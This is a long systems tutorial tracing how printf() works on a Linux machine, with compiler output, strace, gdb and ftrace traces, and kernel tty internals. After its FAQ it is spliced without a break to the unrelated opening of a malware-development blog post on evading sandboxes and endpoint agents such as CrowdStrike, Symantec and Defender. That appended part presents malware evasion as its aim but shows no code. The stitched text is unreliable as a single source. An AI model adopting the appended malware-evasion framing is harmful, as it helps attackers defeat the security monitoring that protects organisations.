Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.


Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassle has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.
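A tiny illustrative example (my own, not from the standard): with both pointer parameters restrict-qualified, the compiler may vectorize or reorder the loop because it can assume dst and src never overlap:

#include <stddef.h>

void scale(size_t n, double * restrict dst, const double * restrict src)
{
    for (size_t i = 0; i < n; i++)
        dst[i] = 2.0 * src[i];  /* no aliasing possible, so loads/stores can be reordered */
}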

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972: %d (decimal), %o (octal), %s (string), %p (string ptr)
1978: top 3 from '72, plus %x (hexadecimal), %u (unsigned decimal), %c (byte/character), %e/%f/%g (floats/dbl)
1989: all from '78, plus %i (signed int), %p (void pointer), %n (output count), %% (complete form)
2011: too many! Read the manual, pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We'll test out printf() with two small plagiarized programs. However, only one of them is truly a candidate for tracing printf().

Trivial printf() (printf0.c) vs. better printf() (printf1.c):
$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}     
$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, so there is no reason to use printf and your compiler won't bother to use it. In fact, you can't even disable this 'optimization' using GCC -O0, because the substitution (fold) happens during semantic analysis (GCC lingo: gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it in to the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.
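For instance, a hypothetical variant of printf1.c: argc can't be folded at compile time, so the printf call survives:

#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n", argc);  /* value unknown until run-time */
  return 0;
}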


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling a program results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file, but neither has seen any other files yet (no linking). Let's look at the symbols in both of the programs from the last step.

Symbols of the trivial printf() vs. the more useful printf():
$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts
$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol for a simpler function, puts. The file that included a format instead has a symbol for printf. In both cases, the symbol is undefined. The compiler doesn't know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It's up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let's compile and link both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code into the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file, so we can easily trace the standard library functions. In real life, you rarely want to do this; the disadvantages are just too great, especially for maintainability. Here's an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time.


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary shipped with only 34; it needs to find the remaining code in shared libraries and memory-map it into the process address space. We can watch this in action using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones into printf1, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstat are devoted to loading shared libraries. This is the load-time penalty for dynamic linking. Don't worry if this seems like a mess, we won't be using it. If you're interested in more detail, here is the full dump with walkthrough.

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits into three 4kb memory pages (top three lines). The standard library has been mapped into roughly the middle of the address space. Code execution begins in the code area at the top and jumps into the shared library as needed.

This is the last time I'll mention the dynamic-linked version. We'll use the static version from now on since it's easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I've highlighted three of them near the bottom: fstat, mmap, and write. These occur during printf(). We'll trace this better in the next step. First, let's look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/maps
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface, then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard-defined procedure it must follow, except that the correct output is produced within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, the work is done in two parts: a platform-independent side, where a call to printf solves the format substitution problem (Steps 6 and 7), and a platform-dependent side, which calls into the OS kernel with the properly formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It's less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed is ~2300 for the dynamic version and ~1600 for the static one.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf, except the output can go to any file stream, not just the console. fprintf is notable because the C standard defines the supported format types in its description. fprintf() isn't used here, but it's good to know about since it's related to the next function.

vfprintf() — Similar to fprintf, except the variadic arguments are reduced to a single va_list pointer. libc does almost all printing work in this function, including format replacement; (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.
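To see the relationship, here is a minimal sketch (my own code, not glibc's) of printf written as a thin wrapper over vfprintf, mirroring the call sequence described above:

#include <stdio.h>
#include <stdarg.h>

int my_printf(const char * restrict format, ...)
{
    va_list args;

    va_start(args, format);
    int written = vfprintf(stdout, format, args);  /* all the real work */
    va_end(args);
    return written;  /* character count, or negative on error */
}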

These high-level print functions obey the buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal GCC (libio) functions. Finally, write is the last step before handing work to the kernel. If you aren't familiar with how these work, I recommend reading about the GCC way of managing I/O.

Bonus: Some extra reading about buffering with nice diagrams
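A quick self-contained demo of those buffering rules (an illustrative sketch, not from the trace below): force full buffering on stdout, and nothing reaches the console until an explicit flush:

#include <stdio.h>

int main(void)
{
    setvbuf(stdout, NULL, _IOFBF, BUFSIZ);  /* switch stdout to full buffering */
    printf("Hello World %d", 1);            /* no newline: string sits in the buffer */
    fflush(stdout);                         /* now the write syscall happens */
    return 0;
}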

Let’s trace our path through the standard library

printf() execution sequence:

$ gdb ./printf1_s
...
main at printf1.c:5
5         printf("Hello World %d\n", 1);
0x400e02  5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x425ce0 in _IO_doallocbuf ()
0x4614f0 in _IO_file_doallocate ()
0x4235d0 in _IO_file_stat ()
0x40f8b0 in _fxstat ()   ### fstat syscall
0x461515 in _IO_file_doallocate ()
0x410690 in mmap64 ()    ### mmap syscall
0x46155e in _IO_file_doallocate ()
0x425c70 in _IO_setb ()
0x461578 in _IO_file_doallocate ()
0x425d15 in _IO_doallocbuf ()
0x424d38 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x425dc0 in _IO_default_xsputn ()
...cut 11 repeats of last 2 functions...
0x425e7c in _IO_default_xsputn ()
0x423d02 in _IO_new_file_xsputn ()
0x41475e in vfprintf ()
0x414360 in _itoa_word ()
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x41501f in vfprintf ()
0x40c110 in strchrnul ()
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x4235e0 in _IO_new_file_write ()
0x40f9c7 in write ()
0x40f9c9 in __write_nocancel ()   ### write syscall happens here
0x423623 in _IO_new_file_write ()
0x42443c in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x414d3b in vfprintf ()
0x408450 in free ()
0x41478b in vfprintf ()
0x408450 in free ()
0x414793 in vfprintf ()
0x401dc6 in printf ()
main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at this code trace, we can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_* — These functions are part of GCC's libio module, which manages the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let's think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across it from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

A few function calls after that final vfprintf() call is the hand-off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. Each substitution handed a pointer to the finished string to libio for line buffering. Let's take a peek at the first round only:

The hand-off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (the current position), but it's up to strchrnul() to find a pointer to the start of the next '%' or the end of the string. We can follow the parsing rules in the GCC source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.
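To summarize the mechanics, here is a deliberately naive sketch (my own simplification, not glibc's code) of the scanning loop's shape: emit the literal run up to the next '%', dispatch on the conversion character, repeat:

#include <stdio.h>
#include <string.h>

static void scan_format(const char *fmt)
{
    while (*fmt) {
        const char *spec = strchr(fmt, '%');  /* glibc uses __strchrnul instead */
        size_t plain = spec ? (size_t)(spec - fmt) : strlen(fmt);
        fwrite(fmt, 1, plain, stdout);        /* buffer the literal run */
        if (!spec)
            break;
        /* spec[1] is the conversion ('d', 's', ...); the real vfprintf
           dispatches through a jump table here. This sketch only
           handles single-character conversions and skips them. */
        fmt = spec + 2;
    }
}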


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, "Hello World 1", now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the 'write' syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);
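As a quick illustration (a sketch of my own, not part of the trace): calling write directly skips stdio entirely and hands the bytes straight to the kernel, which is exactly what libio does once its buffer flushes:

#include <unistd.h>
#include <string.h>

int main(void)
{
    const char *msg = "Hello World 1\n";
    write(STDOUT_FILENO, msg, strlen(msg));  /* straight to the kernel, no buffering */
    return 0;
}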

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, which is architecture-dependent. That's why we see a jump from libc's libio code to our test architecture's code under (gcc)/sysdeps. When your standard library and OS are compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let's tackle one of the common complaints from beginners reading glibc source code: the 1000 different ways write() appears. At the binary level, this problem goes away after static linking. In our case, write() == __write() == __libc_write().

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

write simply checks the threading state and, assuming all is well, moves the write syscall number (1) into EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count
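Those four registers are everything the kernel needs. As a final illustrative sketch (GCC inline assembly, my own code, not glibc's), here is the same write performed with a raw syscall instruction; note that syscall clobbers rcx and r11:

#include <string.h>

/* x86-64 Linux: rax = syscall number (1 = write), rdi = fd,
   rsi = buffer, rdx = length. The return value comes back in rax. */
static long raw_write(int fd, const void *buf, unsigned long len)
{
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(1L), "D"((long)fd), "S"(buf), "d"(len)
                      : "rcx", "r11", "memory");
    return ret;
}

int main(void)
{
    const char *msg = "Hello World 1\n";
    raw_write(1, msg, strlen(msg));
    return 0;
}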

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system, and I'll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster: the process has exclusive use of the pty, whereas many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain them, I happened upon an excellent write-up by Linus Åkesson. He explains it far better than I could, and the diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
[top output showing bash, top, and printf1_s all attached to pts/0]

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this Linux kernel version’s source, include/uapi/linux/major.h:

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume move ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *tty. This struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome-terminal process, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked several times in a short period how some of these functions are implemented, and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to find time to write the final part of the series on Malware Development. But I have been receiving a lot of DMs on Twitter lately asking me to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organizations. One is at the network level, where it tries to identify anomalies based on the behavior of network connections, proxy logs, and patterns of connections over time. Most network ML solutions tend to analyze malware beacons and use DPI (deep packet inspection) to identify malware. This is something that Microsoft ATA (Advanced Threat Analytics) or FireEye sandboxes do. On the other hand, we have endpoint agents like Symantec EP, CrowdStrike, Endgame, Microsoft Cloud Defender and similar monitoring tools, which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways we can make our malware behave like a legitimate executable, or confuse the endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade the CrowdStrike agent, Symantec EP and Microsoft Windows Cloud Defender; videos of the latter I have already posted in my previous blogs. However, you might need to modify or add new techniques, as these might become detectable over time. One of the best ways to avoid AV is to disable process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads, and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malware in C, and only selected payloads in shellcode. A combination of these two makes malware unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

